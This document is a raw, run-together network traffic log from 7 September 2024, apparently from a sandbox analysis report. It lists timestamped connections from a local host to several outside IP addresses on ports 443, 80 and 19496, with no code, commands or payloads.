                                      Sep 7, 2024 01:48:09.755132914 CEST44349763104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:09.757611036 CEST49763443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:09.804492950 CEST44349763104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:09.914058924 CEST44349763104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:09.914108992 CEST44349763104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:09.914140940 CEST44349763104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:09.914213896 CEST44349763104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:09.914258957 CEST49763443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:09.915889025 CEST49763443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:10.111416101 CEST4976480192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:10.116168022 CEST8049764208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:10.116249084 CEST4976480192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:10.116369963 CEST4976480192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:10.121098995 CEST8049764208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:10.702446938 CEST8049764208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:10.750519991 CEST4976480192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:10.897876024 CEST8049764208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:10.897952080 CEST4976480192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:10.974395990 CEST49765443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:10.974457979 CEST44349765188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:10.974524021 CEST49765443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:10.976422071 CEST49765443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:10.976435900 CEST44349765188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:12.286892891 CEST44349765188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:12.286957026 CEST49765443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:12.288203955 CEST49765443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:12.288213968 CEST44349765188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:12.288453102 CEST44349765188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:12.299257040 CEST49765443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:12.344507933 CEST44349765188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:12.420573950 CEST44349765188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:12.420649052 CEST44349765188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:12.420725107 CEST49765443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:12.421351910 CEST49765443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:12.422938108 CEST49766443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:12.422972918 CEST44349766104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:12.423063993 CEST49766443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:12.423294067 CEST49766443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:12.423306942 CEST44349766104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:12.712366104 CEST1949649760147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:12.712433100 CEST4976019496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:13.152247906 CEST44349766104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:13.152335882 CEST49766443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:13.153808117 CEST49766443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:13.153831959 CEST44349766104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:13.154494047 CEST44349766104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:13.155375957 CEST49766443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:13.200500011 CEST44349766104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:13.320004940 CEST44349766104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:13.320055008 CEST44349766104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:13.320086956 CEST44349766104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:13.320117950 CEST49766443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:13.320161104 CEST44349766104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:13.320178986 CEST44349766104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:13.320218086 CEST49766443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:13.323271036 CEST49766443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:15.186912060 CEST4976019496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:15.380738974 CEST1949649760147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:15.416980028 CEST4976719496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:15.422064066 CEST1949649767147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:15.422133923 CEST4976719496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:15.553402901 CEST49768443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:15.553440094 CEST44349768188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:15.553621054 CEST49768443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:15.555816889 CEST49768443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:15.555829048 CEST44349768188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:15.596390009 CEST4976719496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:15.601224899 CEST1949649767147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:16.062894106 CEST4976980192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:16.339689016 CEST8049769208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:16.339764118 CEST4976980192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:16.339941978 CEST4976980192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:16.341475964 CEST44349768188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:16.341558933 CEST49768443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:16.343358994 CEST49768443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:16.343364954 CEST44349768188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:16.343621016 CEST44349768188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:16.344773054 CEST8049769208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:16.372101068 CEST49768443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:16.416496992 CEST44349768188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:16.487240076 CEST44349768188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:16.487298965 CEST44349768188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:16.487386942 CEST49768443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:16.488053083 CEST49768443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:16.496401072 CEST49770443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:16.496447086 CEST44349770104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:16.496531963 CEST49770443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:16.496807098 CEST49770443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:16.496824980 CEST44349770104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:16.903023958 CEST8049769208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:16.913681984 CEST4976980192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:16.918843031 CEST8049769208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:16.918930054 CEST4976980192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:16.969753027 CEST44349770104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:16.969831944 CEST49770443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:16.971378088 CEST49770443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:16.971390963 CEST44349770104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:16.971628904 CEST44349770104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:16.972425938 CEST49770443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:17.012504101 CEST44349770104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:17.106885910 CEST44349770104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:17.106926918 CEST44349770104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:17.106951952 CEST44349770104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:17.107008934 CEST49770443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:17.107052088 CEST44349770104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:17.107073069 CEST44349770104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:17.107100010 CEST49770443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:17.107132912 CEST49770443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:17.109641075 CEST49770443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:18.755775928 CEST49771443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:18.755815983 CEST44349771162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:18.755888939 CEST49771443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:18.756215096 CEST49771443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:18.756226063 CEST44349771162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:19.270901918 CEST44349771162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:19.270967960 CEST49771443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:19.278731108 CEST49771443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:19.278748989 CEST44349771162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:19.278963089 CEST44349771162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:19.280239105 CEST49771443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:19.320503950 CEST44349771162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:19.385838032 CEST44349771162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:19.387835979 CEST49771443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:19.387849092 CEST44349771162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:19.630053997 CEST44349771162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:19.630156994 CEST44349771162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:19.630222082 CEST49771443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:19.631212950 CEST49771443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:19.631901026 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:19.631943941 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:19.632136106 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:19.632360935 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:19.632374048 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.050405025 CEST49773443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:20.050450087 CEST44349773188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:20.051357031 CEST49773443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:20.058787107 CEST49773443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:20.058804989 CEST44349773188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:20.096615076 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.097876072 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.097910881 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.214617968 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.254281044 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.254281044 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.254329920 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.254343987 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.254750013 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.254755974 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.254812956 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.254827023 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.254888058 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.254899979 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.254951000 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.254961014 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.254976988 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.254987001 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.254996061 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.255007982 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.255065918 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.255075932 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.255098104 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.255110025 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.255124092 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.255134106 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.255151987 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.255162954 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.255307913 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.255323887 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.255345106 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.255353928 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.255362034 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.255372047 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.255378962 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.255387068 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.255508900 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.255520105 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.255527020 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.255533934 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.255558014 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.255572081 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.255588055 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.255597115 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.255614042 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.255619049 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.255717993 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.255728006 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.255747080 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.255753040 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.255805969 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.255812883 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.255824089 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.255836964 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.255850077 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.255855083 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.256099939 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:20.256103992 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:20.376797915 CEST1949649767147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:20.376985073 CEST4976719496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:20.524058104 CEST44349773188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:20.524127960 CEST49773443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:20.526886940 CEST49773443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:20.526895046 CEST44349773188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:20.527837992 CEST44349773188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:20.550297976 CEST49773443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:20.592502117 CEST44349773188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:20.664247990 CEST44349773188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:20.664304018 CEST44349773188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:20.665018082 CEST49773443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:20.672064066 CEST49774443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:20.672106981 CEST44349774104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:20.672211885 CEST49774443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:20.673414946 CEST49774443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:20.673425913 CEST44349774104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:21.134675026 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:21.134788036 CEST44349772162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:48:21.135116100 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:21.135514021 CEST49772443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:48:21.142049074 CEST4976480192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:21.160021067 CEST4976719496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:21.160109043 CEST44349774104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:21.160171032 CEST49774443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:21.161462069 CEST49774443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:21.161469936 CEST44349774104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:21.162218094 CEST44349774104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:21.163049936 CEST49774443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:21.163898945 CEST4977519496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:21.166560888 CEST1949649767147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:21.170934916 CEST1949649775147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:21.170995951 CEST4977519496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:21.199127913 CEST4977519496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:21.204200983 CEST1949649775147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:21.204503059 CEST44349774104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:21.305063009 CEST44349774104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:21.305119038 CEST44349774104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:21.305176973 CEST44349774104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:21.305177927 CEST49774443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:21.305187941 CEST44349774104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:21.305226088 CEST49774443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:21.305233955 CEST44349774104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:21.305283070 CEST44349774104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:21.305325031 CEST49774443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:21.307286024 CEST49774443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:22.461067915 CEST49776443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:22.461100101 CEST44349776188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:22.461200953 CEST49776443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:22.463852882 CEST49776443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:22.463865042 CEST44349776188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:23.077061892 CEST44349776188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:23.077138901 CEST49776443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:23.081208944 CEST49776443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:23.081218004 CEST44349776188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:23.081473112 CEST44349776188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:23.120964050 CEST49776443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:23.164514065 CEST44349776188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:23.226434946 CEST44349776188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:23.226492882 CEST44349776188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:23.226916075 CEST49776443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:23.227188110 CEST49776443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:23.228348017 CEST49778443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:23.228380919 CEST44349778104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:23.228451967 CEST49778443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:23.228732109 CEST49778443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:23.228746891 CEST44349778104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:23.589483023 CEST4977980192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:23.594556093 CEST8049779208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:23.594638109 CEST4977980192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:23.594831944 CEST4977980192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:23.599689007 CEST8049779208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:23.685971022 CEST44349778104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:23.686043978 CEST49778443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:23.687424898 CEST49778443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:23.687433004 CEST44349778104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:23.687664986 CEST44349778104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:23.688693047 CEST49778443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:23.736494064 CEST44349778104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:23.834340096 CEST44349778104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:23.834383011 CEST44349778104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:23.834414959 CEST44349778104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:23.834532022 CEST49778443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:23.834547043 CEST44349778104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:23.834558964 CEST44349778104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:23.834593058 CEST49778443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:23.834618092 CEST49778443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:23.836560011 CEST49778443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:24.062818050 CEST8049779208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:24.109908104 CEST4977980192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:24.836148024 CEST49780443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:24.836205006 CEST44349780188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:24.836292028 CEST49780443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:24.838321924 CEST49780443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:24.838340998 CEST44349780188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:25.313764095 CEST44349780188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:25.313844919 CEST49780443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:25.315066099 CEST49780443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:25.315073013 CEST44349780188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:25.315299034 CEST44349780188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:25.325403929 CEST49780443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:25.372512102 CEST44349780188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:25.465579987 CEST44349780188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:25.465640068 CEST44349780188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:25.465924025 CEST49780443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:25.466464043 CEST49780443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:25.468091011 CEST49781443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:25.468133926 CEST44349781104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:25.468205929 CEST49781443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:25.468514919 CEST49781443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:25.468530893 CEST44349781104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:25.968180895 CEST44349781104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:25.968276978 CEST49781443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:25.972460032 CEST49781443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:25.972475052 CEST44349781104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:25.972727060 CEST44349781104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:25.973875046 CEST49781443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:26.020503998 CEST44349781104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:26.289442062 CEST1949649775147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:26.289529085 CEST4977519496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:26.475898981 CEST1949649775147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:26.476115942 CEST4977519496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:26.635788918 CEST44349781104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:26.635833979 CEST44349781104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:26.635862112 CEST44349781104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:26.635889053 CEST49781443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:26.635910034 CEST44349781104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:26.635937929 CEST44349781104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:26.636125088 CEST49781443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:26.637425900 CEST49781443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:27.941356897 CEST4977519496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:27.946309090 CEST1949649775147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:27.979697943 CEST4978219496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:27.984523058 CEST1949649782147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:27.984586000 CEST4978219496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:28.006737947 CEST4978219496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:28.011646986 CEST1949649782147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:28.640867949 CEST4978380192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:28.645795107 CEST8049783208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:28.645875931 CEST4978380192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:28.646040916 CEST4978380192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:28.650732040 CEST8049783208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:29.244957924 CEST8049783208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:29.257119894 CEST4978380192.168.2.5208.95.112.1
